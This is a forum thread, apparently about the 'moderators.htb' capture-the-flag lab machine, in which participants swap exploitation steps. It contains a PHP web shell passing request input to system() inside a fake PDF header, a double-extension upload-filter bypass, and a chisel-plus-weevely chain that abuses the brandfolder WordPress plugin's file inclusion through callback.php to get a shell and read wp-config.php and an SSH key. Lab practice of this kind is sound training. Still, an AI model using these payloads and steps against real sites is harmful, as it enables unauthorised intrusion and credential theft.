Posts: 42 Threads: 0 Joined: N/A August 7, 2022 at 9:14 AM (August 7, 2022, 08:41 AM)farkow Wrote: (August 7, 2022, 01:31 AM)loge23 Wrote: (August 7, 2022, 01:24 AM)bigdare Wrote: How is everyone bypassing disable_functions? Literally all the good stuff is disabled and I've tried some known bypasses and none work.
https://github.com/epinna/weevely3
Guys this is the best tip ever, focus on this. It does not matter if brandfolder plugin is disabled, it is a php file, and it is going to be executed as lexi. we don't have permissions to write files though right? Posts: 70 Threads: 0 Joined: N/A August 7, 2022 at 9:54 AM (August 7, 2022, 09:14 AM)qwerty173 Wrote: (August 7, 2022, 08:41 AM)farkow Wrote: (August 7, 2022, 01:31 AM)loge23 Wrote: (August 7, 2022, 01:24 AM)bigdare Wrote: How is everyone bypassing disable_functions? Literally all the good stuff is disabled and I've tried some known bypasses and none work.
https://github.com/epinna/weevely3
Guys this is the best tip ever, focus on this. It does not matter if brandfolder plugin is disabled, it is a php file, and it is going to be executed as lexi.
we don't have permissions to write files though right? There are places that you can write files anyway - which is okay because you will reach to your files via callback.php So, if you create an agent with that tool and upload that file,use brandfolder's file inclusion vulnerability to reach your agent, and this agent will bypass the checks - and you can actually open a small shell with this tool - which means, you are actually lexi through php process. But read callback.php first so you can decide how you can rename your file or maybe add some other requirements next to your agent php.
(August 7, 2022, 09:54 AM)farkow Wrote: (August 7, 2022, 09:14 AM)qwerty173 Wrote: (August 7, 2022, 08:41 AM)farkow Wrote: (August 7, 2022, 01:31 AM)loge23 Wrote: (August 7, 2022, 01:24 AM)bigdare Wrote: How is everyone bypassing disable_functions? Literally all the good stuff is disabled and I've tried some known bypasses and none work.
https://github.com/epinna/weevely3
Guys this is the best tip ever, focus on this. It does not matter if brandfolder plugin is disabled, it is a php file, and it is going to be executed as lexi.
we don't have permissions to write files though right?
There are places that you can write files anyway - which is okay because you will reach to your files via callback.php
So, if you create an agent with that tool and upload that file,use brandfolder's file inclusion vulnerability to reach your agent, and this agent will bypass the checks - and you can actually open a small shell with this tool - which means, you are actually lexi through php process.
But read callback.php first so you can decide how you can rename your file or maybe add some other requirements next to your agent php. And of course, this will allow you to read wp-config.php and lexi's ssh key Posts: 28 Threads: 0 Joined: N/A August 7, 2022 at 10:42 AM (August 7, 2022, 07:36 AM)nhocit Wrote: (August 7, 2022, 12:24 AM)fironeDerbert Wrote: (August 7, 2022, 12:20 AM)vexxxi Wrote: any hint for how to bypass pdf filter ? won't let me upload even normal pdf :s
You have to set the name like something.pdf.php and keep the pdf first line and last line format
I uploaded it already like this. The shell doesn't work!
Only echo worked.
It seems like the server disables shell_exec, system, and passthrough function!
<?php
system($_REQUEST['th']);
echo "%PDF-1";
?> don't use the tamplate payload, if there is some opened descriptors you can't be able to create a reverse shell, just create new process for that... that was my problem, I hope it can help you. https://security.stackexchange.com/questions/198928/reverse-php-shell-disconnecting-when-netcat-listenerPosts: 17 Threads: 0 Joined: N/A August 7, 2022 at 10:56 AM (August 7, 2022, 09:54 AM)farkow Wrote: (August 7, 2022, 09:14 AM)qwerty173 Wrote: (August 7, 2022, 08:41 AM)farkow Wrote: (August 7, 2022, 01:31 AM)loge23 Wrote: (August 7, 2022, 01:24 AM)bigdare Wrote: How is everyone bypassing disable_functions? Literally all the good stuff is disabled and I've tried some known bypasses and none work.
https://github.com/epinna/weevely3
Guys this is the best tip ever, focus on this. It does not matter if brandfolder plugin is disabled, it is a php file, and it is going to be executed as lexi.
we don't have permissions to write files though right?
There are places that you can write files anyway - which is okay because you will reach to your files via callback.php
So, if you create an agent with that tool and upload that file,use brandfolder's file inclusion vulnerability to reach your agent, and this agent will bypass the checks - and you can actually open a small shell with this tool - which means, you are actually lexi through php process.
But read callback.php first so you can decide how you can rename your file or maybe add some other requirements next to your agent php.
(August 7, 2022, 09:54 AM)farkow Wrote: (August 7, 2022, 09:14 AM)qwerty173 Wrote: (August 7, 2022, 08:41 AM)farkow Wrote: (August 7, 2022, 01:31 AM)loge23 Wrote: https://github.com/epinna/weevely3
Guys this is the best tip ever, focus on this. It does not matter if brandfolder plugin is disabled, it is a php file, and it is going to be executed as lexi.
we don't have permissions to write files though right?
There are places that you can write files anyway - which is okay because you will reach to your files via callback.php
So, if you create an agent with that tool and upload that file,use brandfolder's file inclusion vulnerability to reach your agent, and this agent will bypass the checks - and you can actually open a small shell with this tool - which means, you are actually lexi through php process.
But read callback.php first so you can decide how you can rename your file or maybe add some other requirements next to your agent php.
And of course, this will allow you to read wp-config.php and lexi's ssh key hello can you tell me more information how i can privilege my escalation to read the wp-config.php Posts: 70 Threads: 0 Joined: N/A August 7, 2022 at 10:59 AM This is how I managed to do it. - Tunnel 8080 to my local port 8090 with chisel
- Generated my agent code with weevely, and renamed the file to wp-load.php
- In a writeable folder on the victim's machine
- I have copied my agent (wp-load.php) to that directory
- I have created the required folders and files (callback.php - require_once)
- I have used empty php files (<?php ?>) for the files mentioned in callback.php
- I opened a terminal with weevely
weevely terminal http://127.0.0.1:8090/wp-content/plugins/brandfolder/callback.php?wp_abspath=/WRITEABLEFOLDER/
[!] No file name, just a folder, so callback.php can load wp-load.php inside. [!] Not 8080, but your tunnel port there. Posts: 17 Threads: 0 Joined: N/A August 7, 2022 at 11:33 AM (August 7, 2022, 10:59 AM)farkow Wrote: This is how I managed to do it.- Tunnel 8080 to my local port 8090 with chisel
- Generated my agent code with weevely, and renamed the file to wp-load.php
- In a writeable folder on the victim's machine
- I have copied my agent (wp-load.php) to that directory
- I have created the required folders and files (callback.php - require_once)
- I have used empty php files (<?php ?>) for the files mentioned in callback.php
- I opened a terminal with weevely
weevely terminal http://127.0.0.1:8090/wp-content/plugins/brandfolder/callback.php?wp_abspath=/WRITEABLEFOLDER/
[!] No file name, just a folder, so callback.php can load wp-load.php inside.
[!] Not 8080, but your tunnel port there. how you get that writable folder ? Posts: 42 Threads: 0 Joined: N/A August 7, 2022 at 11:36 AM (August 7, 2022, 11:33 AM)0xpwny Wrote: (August 7, 2022, 10:59 AM)farkow Wrote: This is how I managed to do it.- Tunnel 8080 to my local port 8090 with chisel
- Generated my agent code with weevely, and renamed the file to wp-load.php
- In a writeable folder on the victim's machine
- I have copied my agent (wp-load.php) to that directory
- I have created the required folders and files (callback.php - require_once)
- I have used empty php files (<?php ?>) for the files mentioned in callback.php
- I opened a terminal with weevely
weevely terminal http://127.0.0.1:8090/wp-content/plugins/brandfolder/callback.php?wp_abspath=/WRITEABLEFOLDER/
[!] No file name, just a folder, so callback.php can load wp-load.php inside.
[!] Not 8080, but your tunnel port there.
how you get that writable folder ? I assume you could just use something like /tmp/ right? I'm trying but it's still not working. I'm forwarding socks though so idk if that changes things... Posts: 17 Threads: 0 Joined: N/A August 7, 2022 at 11:43 AM (August 7, 2022, 11:36 AM)qwerty173 Wrote: (August 7, 2022, 11:33 AM)0xpwny Wrote: (August 7, 2022, 10:59 AM)farkow Wrote: This is how I managed to do it.- Tunnel 8080 to my local port 8090 with chisel
- Generated my agent code with weevely, and renamed the file to wp-load.php
- In a writeable folder on the victim's machine
- I have copied my agent (wp-load.php) to that directory
- I have created the required folders and files (callback.php - require_once)
- I have used empty php files (<?php ?>) for the files mentioned in callback.php
- I opened a terminal with weevely
weevely terminal http://127.0.0.1:8090/wp-content/plugins/brandfolder/callback.php?wp_abspath=/WRITEABLEFOLDER/
[!] No file name, just a folder, so callback.php can load wp-load.php inside.
[!] Not 8080, but your tunnel port there.
how you get that writable folder ?
I assume you could just use something like /tmp/ right? I'm trying but it's still not working. I'm forwarding socks though so idk if that changes things... can you explain me this etap: - I have created the required folders and files (callback.php - require_once)
Posts: 17 Threads: 0 Joined: N/A August 7, 2022 at 12:03 PM (August 7, 2022, 10:59 AM)farkow Wrote: This is how I managed to do it.- Tunnel 8080 to my local port 8090 with chisel
- Generated my agent code with weevely, and renamed the file to wp-load.php
- In a writeable folder on the victim's machine
- I have copied my agent (wp-load.php) to that directory
- I have created the required folders and files (callback.php - require_once)
- I have used empty php files (<?php ?>) for the files mentioned in callback.php
- I opened a terminal with weevely
weevely terminal http://127.0.0.1:8090/wp-content/plugins/brandfolder/callback.php?wp_abspath=/WRITEABLEFOLDER/
[!] No file name, just a folder, so callback.php can load wp-load.php inside.
[!] Not 8080, but your tunnel port there. can you explain me the 2 and 3 etap please Posts: 24 Threads: 0 Joined: N/A August 7, 2022 at 12:05 PM (August 7, 2022, 02:45 AM)yumi Wrote: (August 7, 2022, 01:21 AM)vexxxi Wrote: (August 7, 2022, 01:12 AM)fironeDerbert Wrote: (August 7, 2022, 12:49 AM)vexxxi Wrote: (August 7, 2022, 12:24 AM)fironeDerbert Wrote: You have to set the name like something.pdf.php and keep the pdf first line and last line format
just tried that and wasn't able to get it to go through just always says only pdfs allowed
it should be getting uploaded to /logs/uploads/ right ?
Try to upload a regular pdf and see how the filter works, and yes the file will be uploaded in /logs/uploads
even for regular pdfs it still gives me only pdf files allowed message, ive tried 3 different ones for regular upload including one of the ones from the logs/hash/logs.pdf
upload a pdf you alredy found on server.
upload and with burp change content from PDF to you php reverse shell.
after that access http://moderators.htb/logs/uploads/shell.pdf.php tried again today w/ the same pdf from the log files that i tried yesterday and now it finally accepts uploads ,got shell guess it might've been an issue w the box maybe i tried this one + other regular pdfs every single one was failing |
